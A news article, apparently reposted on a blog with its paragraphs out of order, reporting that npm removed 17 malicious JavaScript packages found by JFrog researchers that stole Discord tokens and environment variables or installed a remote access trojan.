![]() This year, both JFrog and fellow DevOps security firm Sonatype have found tens of malicious libraries uploaded on both the npm (JavaScript) and PyPI (Python) package repositories, and all signs point to some sort of process automation in the creation of these malicious packages at scale. However, while JFrog deserves credit for its recent discovery, the incident is not an isolated incident. These variables normally store user and OS information, but in some cases, they can also contain API keys and login credentials, something that an attacker would definitely be interested in collecting.Īnd last but not least, a 17th package also downloaded and installed a full-blown remote access trojan that granted the threat actor full control over a developer's computer. Polkovnychenko and Menasche said that if a developer had downloaded and installed any of these libraries, they would have executed malicious code on their systems that either installed malware or collected data to send back to the attackers.įour of the npm JavaScript libraries contained functions to collect Discord access tokens, which effectively act as authentication cookies and can allow attackers to hijack an infected developer's Discord account.Ī fifth npm package contained a copy of PirateStealer, a piece of malware that could also extract other data from Discord apps and accounts, such as payment card details, login credentials, and personal information.Īnother set of eleven libraries included functions that collected environment variables, which are details from a developer's local programming environment. "Luckily, these packages were removed before they could rack up a large number of downloads (based on npm records) so we managed to avoid a scenario similar to our last PyPI disclosure, where the malicious packages were downloaded tens of thousands of times before they were detected and removed," said Andrey Polkovnychenko and Shachar Menashe, two security researchers at DevOps security firm JFrog, and the ones who spotted and reported the malicious packages to the npm team. The Node Package Manager (npm) security team has removed 17 JavaScript libraries this week that contained malicious code to collect and steal Discord access tokens and environment variables from users' computers. Malicious npm packages caught stealing Discord tokens, environment variables
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |